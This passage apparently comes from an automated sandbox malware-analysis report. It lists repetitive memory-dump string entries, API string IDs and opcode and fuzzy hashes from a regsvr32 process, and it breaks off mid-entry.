                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ]u$"$:;
                                • API String ID: 0-2021956800
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: :/$MX-$p/{
                                • API String ID: 0-4131788469
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #X$^'$r]I
                                • API String ID: 0-2222137400
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: @$T3$$w4
                                • API String ID: 0-2021144935
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: fuQ$z2[
                                • API String ID: 0-2289383304
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: :C$kR[
                                • API String ID: 0-2209222604
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: U/a$b*I
                                • API String ID: 0-148379327
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Jl$aijA
                                • API String ID: 0-1592139677
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: E!X$aT
                                • API String ID: 0-1608121357
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: i6$5t
                                • API String ID: 0-3127670231
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: t3Z$r'
                                • API String ID: 0-3247238830
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: N}V$jt
                                • API String ID: 0-2926509837
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: |I$}r/
                                • API String ID: 0-4123960085
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Fd7$T;
                                • API String ID: 0-1040651304
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: bep$o1S[
                                • API String ID: 0-985821681
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: _6#$u<
                                • API String ID: 0-4076860791
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Nz$Nz
                                • API String ID: 0-3618188535
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 10W$ra"
                                • API String ID: 0-3432184507
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Dm"i$e
                                • API String ID: 0-579088429
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: . 9$j~F
                                • API String ID: 0-3982525500
                                • Opcode ID: 8e27ed3e49b3a332b1e9bdfaf9f41fe9f17daf01a485ce033b7626c7aaf20959
                                • Instruction ID: 73f587e096f547b5323f36eeea6c902c11c99e62676f2e49b342c8d806439c0b
                                • Opcode Fuzzy Hash: 8e27ed3e49b3a332b1e9bdfaf9f41fe9f17daf01a485ce033b7626c7aaf20959
                                • Instruction Fuzzy Hash: C951E3B190034A8FCF48CF68C5864EE7FB1FB58398F50461DE85AAA250D37896A4CFC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: <>$u_"
                                • API String ID: 0-3712044913
                                • Opcode ID: 54a7279f070d6e0e1cb936a4c41fbfa7e6deebc7b08f576cf545ddb7c45c5dbd
                                • Instruction ID: 00705162336351badf1f89c020232bf89398a1e9550ad3a4c6adce9a79b90856
                                • Opcode Fuzzy Hash: 54a7279f070d6e0e1cb936a4c41fbfa7e6deebc7b08f576cf545ddb7c45c5dbd
                                • Instruction Fuzzy Hash: FC51BFB090034E8FCB48CF69D48A5DE7FB1FB58398F104619E856AA250D37496A8CBC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Wm$`W
                                • API String ID: 0-829970788
                                • Opcode ID: 1814abb82c64624d0c82e6b0c2fd8fef1d44b2e07111184ee76eb17802e65ade
                                • Instruction ID: 3e5335a01fca1db20c73b4a4a46b2fe43dbf21032e81bd0b2231691c24575172
                                • Opcode Fuzzy Hash: 1814abb82c64624d0c82e6b0c2fd8fef1d44b2e07111184ee76eb17802e65ade
                                • Instruction Fuzzy Hash: F041C070D1461C8FCF48DFA9D886ADDBBB0FB48304F20821DE456B6260C7789948CF69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 7M$kJz
                                • API String ID: 0-1286445197
                                • Opcode ID: 98bdb79501751698457a0c63b58abd008b0bb4ffe469ed6aba7912a1c6e09250
                                • Instruction ID: 73e64fa095a73a4e7c26ce88557ae34d60ddb43780546a58e46c5e1049f230da
                                • Opcode Fuzzy Hash: 98bdb79501751698457a0c63b58abd008b0bb4ffe469ed6aba7912a1c6e09250
                                • Instruction Fuzzy Hash: E441D5B180034E9FCB48CF68D48A5DEBFB0FB58398F118619F815AA260D7B49694CFC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: NKi$gJk
                                • API String ID: 0-746334108
                                • Opcode ID: 58a5bce911c0f09ef1344d541f8e13db5683852ad3f58203c0096be295061b76
                                • Instruction ID: 370847f9a3576a2127be3913012de96f7d2fcf003f6ba5f8aec55f91b5c1372d
                                • Opcode Fuzzy Hash: 58a5bce911c0f09ef1344d541f8e13db5683852ad3f58203c0096be295061b76
                                • Instruction Fuzzy Hash: AD41C3B091034A8FCB48CF68C48A5DE7FF0FB28398F104619E815A6250D37496A8CFD5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 97"$lND
                                • API String ID: 0-255837067
                                • Opcode ID: 9f2144797edb960c4800540d43b86211ccc900e5f41a7482899803b998be048c
                                • Instruction ID: fdd228a39bc21f447827aa5875072745b1c1c90cd936de3499e4094daaa9051d
                                • Opcode Fuzzy Hash: 9f2144797edb960c4800540d43b86211ccc900e5f41a7482899803b998be048c
                                • Instruction Fuzzy Hash: 2F41D4B080038E8FCB48CFA8D8865DE7BF0FB48358F504609E86AA6250D7B49665CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: <\$P
                                • API String ID: 0-3329260309
                                • Opcode ID: 58da91c3c3294d218300734e2334eac2d42de78c76df722d29d8bba67d1a0edb
                                • Instruction ID: 7a6472800a972813acd2230f771f615073e8df7510407cf225569f4894f6b0d7
                                • Opcode Fuzzy Hash: 58da91c3c3294d218300734e2334eac2d42de78c76df722d29d8bba67d1a0edb
                                • Instruction Fuzzy Hash: AC41A2B181034DCFDB44CF68C88A5DE7FF0FB58358F104619E869A6250D7B89698CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: &Z];$j,
                                • API String ID: 0-1323350831
                                • Opcode ID: 0816880f4d87a32c826b6eaf935fab6bcbeafe9302e1cf1b19fce18330a9178f
                                • Instruction ID: 4d52acf51d445db6beda3a26974f1176594abf5478927dcbf805cd9d8e8fa18c
                                • Opcode Fuzzy Hash: 0816880f4d87a32c826b6eaf935fab6bcbeafe9302e1cf1b19fce18330a9178f
                                • Instruction Fuzzy Hash: 9F31DEB190074E8BCF48DF24C88A1DE3BA1FB28798F50461DFC5696250D7B4D6A4CBC4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 'd=$Y6C
                                • API String ID: 0-2002142494
                                • Opcode ID: fd35d43619dc3a263a01b5f940063c5335a5c98091513a5ed1770b6a4388dd96
                                • Instruction ID: ccf6aaa63b1aa8c6b30d000549e8006a3e599278b8e3fc9790a4e3cb01e02506
                                • Opcode Fuzzy Hash: fd35d43619dc3a263a01b5f940063c5335a5c98091513a5ed1770b6a4388dd96
                                • Instruction Fuzzy Hash: 744191B190034E9FCB44CFA8D48A5DEBFF0FB58398F205619E81AA6250D3B49694CFD5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 27A$Cm)X
                                • API String ID: 0-3608389941
                                • Opcode ID: e0490a94f28e6ce23732593848f5f9e9112bddaf8c3b402d699b48d1b456956c
                                • Instruction ID: 684b918ddde8746cffb287e87a4350d0062747792986074a3c358ea6f2ed809a
                                • Opcode Fuzzy Hash: e0490a94f28e6ce23732593848f5f9e9112bddaf8c3b402d699b48d1b456956c
                                • Instruction Fuzzy Hash: 15316FB46187848B8348DF28D59551ABBE5FBCC308F404B2DF4CAAB360D778D644CB4A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ?oCf$Wu
                                • API String ID: 0-2445847193
                                • Opcode ID: b07007c7df8fdcff1a3a12132ff18166943f80f753e521aa0974c7cb649c130d
                                • Instruction ID: 6e752a1dbd70b7d88cda0fb1d20915d08c65693f2945daa64a17bfbf07288bfe
                                • Opcode Fuzzy Hash: b07007c7df8fdcff1a3a12132ff18166943f80f753e521aa0974c7cb649c130d
                                • Instruction Fuzzy Hash: 5E21AEB55187848B83489F28C44A41ABBE0FB8C70DF504B2DF8DAA6260D778D646CB4B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0F6 $KO
                                • API String ID: 0-276686719
                                • Opcode ID: 6205ceb11bb6b662748add8c297f1b443fa17d6724776aa75fc58f5dae511f0b
                                • Instruction ID: 15a0bfab9284e0424f8d805b4637dfad6d31782236c6d70db9798c35a47a8228
                                • Opcode Fuzzy Hash: 6205ceb11bb6b662748add8c297f1b443fa17d6724776aa75fc58f5dae511f0b
                                • Instruction Fuzzy Hash: AB21AD755283808FC368DF68C58614BBBF0FB86748F504A1DFAC686261D7B6D805CB47
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: p$tSA
                                • API String ID: 0-3551818358
                                • Opcode ID: 99011765d78b2b4d15352d42fcf875ddc55d3d35c100f7abdde6317782da955f
                                • Instruction ID: dafa682f426fd7c4027cc0dc28289443c8a7082daafb3c1476061bf3b97c4e55
                                • Opcode Fuzzy Hash: 99011765d78b2b4d15352d42fcf875ddc55d3d35c100f7abdde6317782da955f
                                • Instruction Fuzzy Hash: 4A2169B45183858BD788DF28C54A50BBBE0BBCD74CF400B2DF4CAA6260D378D644CB4A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 8r.F$P?
                                • API String ID: 0-1060054278
                                • Opcode ID: 69901aac6ce1aef3d4959f7919bc5ecc16501e8ce7d01dbb2ce958a2c67dc727
                                • Instruction ID: b2da1e8a0f89ffdbcd525e428a91df6a678b185604bab408c7dee67f2374b2b0
                                • Opcode Fuzzy Hash: 69901aac6ce1aef3d4959f7919bc5ecc16501e8ce7d01dbb2ce958a2c67dc727
                                • Instruction Fuzzy Hash: DC2179B45187849BC749DF68D44A41ABBE0BB9C71CF800B5DF4CAAA310D3B8D645CB4A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: <>
                                • API String ID: 0-1927776135
                                • Opcode ID: 37c3f39876e999beb0937df684067ca5812f0cda9578e561258942df6de8421c
                                • Instruction ID: 9b9c084f2c1b1f08cb5858c99f1f27cbdd47ca95557f3058ff07422eb4e47033
                                • Opcode Fuzzy Hash: 37c3f39876e999beb0937df684067ca5812f0cda9578e561258942df6de8421c
                                • Instruction Fuzzy Hash: F742047190438C9BDBB9CFA8D8CA6DD7BB0FB58314F20421DD80A9B261DB745A85CF85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: j=
                                • API String ID: 0-592141216
                                • Opcode ID: 1169f1869d3fb428bfdad968f94ee3f32c89471e58a558a0d80dd63f76afa428
                                • Instruction ID: 9003355423bafd58b5275d98cfc2247977288ca0e37ad1cbcdd73f3390e5cf1b
                                • Opcode Fuzzy Hash: 1169f1869d3fb428bfdad968f94ee3f32c89471e58a558a0d80dd63f76afa428
                                • Instruction Fuzzy Hash: 6BD1397150074D8BDF89DF28C89A6DE3BA0FB58398F55522CFC4AA6250C778D998CBC4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !O
                                • API String ID: 0-2378650393
                                • Opcode ID: 302dfdcfbb7bb296299c3bc274bc73d8feb87790668f515a7c841834ed93dc2b
                                • Instruction ID: 4170ec84c9d3f49002394f5178db7bb3edfe66952fd3c2890134f0e6da5031b0
                                • Opcode Fuzzy Hash: 302dfdcfbb7bb296299c3bc274bc73d8feb87790668f515a7c841834ed93dc2b
                                • Instruction Fuzzy Hash: F2E10A711087C88BDBFADF64C88ABDE3BACFB44748F105519EA0A9E258CB745748CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ^Lu
                                • API String ID: 0-3854589714
                                • Opcode ID: fb3768cccb7a26f6a89fbcd18e8308750f02c0f1f73e9d8b382492f454794486
                                • Instruction ID: 7c859a126a25bd0c02bef77f14247f717a5a9adcaacfb9e6f8c6730b8303fd88
                                • Opcode Fuzzy Hash: fb3768cccb7a26f6a89fbcd18e8308750f02c0f1f73e9d8b382492f454794486
                                • Instruction Fuzzy Hash: E4A128709047498FCB9DCF68C88A6EEBBF1FF48384F204119EA46A7250D7759A85CB81
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Z"
                                • API String ID: 0-1896177830
                                • Opcode ID: 85f6676341921d6f483625aa17b45c04f6466e2be55beb334fa49e51010a1540
                                • Instruction ID: 91163448777d7afc4cc80e296cb9cfbd8772b1902329242c75d45222aab24025
                                • Opcode Fuzzy Hash: 85f6676341921d6f483625aa17b45c04f6466e2be55beb334fa49e51010a1540
                                • Instruction Fuzzy Hash: C0A165B590060DCFCBA8CF78D15A68E7BF1BB04308F606129EC269A262E774D619CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: e8f2
                                • API String ID: 0-4239716772
                                • Opcode ID: 3907476c53bac25a555e3ffc467f8b6ad850bf32927a98fe31c8bf9de770097f
                                • Instruction ID: aaec5001b0b3f576b33a9a86a913a78c3f9fdfa8ed470970e8cb6047951b043a
                                • Opcode Fuzzy Hash: 3907476c53bac25a555e3ffc467f8b6ad850bf32927a98fe31c8bf9de770097f
                                • Instruction Fuzzy Hash: C491C37010078E8BDF49DF24D89A5DA3BA1FB58348F114618FC5A97294C7B8EA65CBC4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Qhm
                                • API String ID: 0-202924511
                                • Opcode ID: a2bb8b1411107b7575902c6661116fd2ce5bfac275bcbff6451e16fcd58631a3
                                • Instruction ID: dff427aa29f5729145b0ab8b996757c093157db28b416262619acb8c77b37c14
                                • Opcode Fuzzy Hash: a2bb8b1411107b7575902c6661116fd2ce5bfac275bcbff6451e16fcd58631a3
                                • Instruction Fuzzy Hash: 1D511479517209CBCB69CF38D4D56E93BE0EF68344F20012DFC668B2A2DB70D5268B48
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: WZ'
                                • API String ID: 0-1944904082
                                • Opcode ID: 8b55f411d49b287bdfafef9dc47725f2bb274e5ab4be629ead2bc2b735d307b3
                                • Instruction ID: 5b5aaaf1f09ca5557c90149fa64bb16396cbc43774f49a57b3b09e68a9cf408c
                                • Opcode Fuzzy Hash: 8b55f411d49b287bdfafef9dc47725f2bb274e5ab4be629ead2bc2b735d307b3
                                • Instruction Fuzzy Hash: F171087155878CDBDBBADF28C8897D937B1FB98304F908219D80E8E254DB785B4ACB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: -]
                                • API String ID: 0-3195032325
                                • Opcode ID: 2f387ab0a9f756c6099ceefcc45306d74e879ef7c324eb87884d154b92a960fc
                                • Instruction ID: 01c3c27378e714c100c9a801295078fc99e5b088b1ed4129002e73aaaa485763
                                • Opcode Fuzzy Hash: 2f387ab0a9f756c6099ceefcc45306d74e879ef7c324eb87884d154b92a960fc
                                • Instruction Fuzzy Hash: 0151297010064D8BCB49DF28D4855D93FE1FB0C3ACF1A6318FD4AAA251D774D989CB88
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: }4}
                                • API String ID: 0-922147943
                                • Opcode ID: 13f685bfa53c13813d4a1c5d0eb0e1f62a0b1129b8c138172dc2148ffb4c9b25
                                • Instruction ID: d7790a4c64fa8f9a696ea70ce14f4ff71b76161c227bc6b72ade158e86aff98b
                                • Opcode Fuzzy Hash: 13f685bfa53c13813d4a1c5d0eb0e1f62a0b1129b8c138172dc2148ffb4c9b25
                                • Instruction Fuzzy Hash: 3461F2B090075D8FCF48DFA4C88A5EEBBB0FB18348F114219E849B6250D7789A09CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
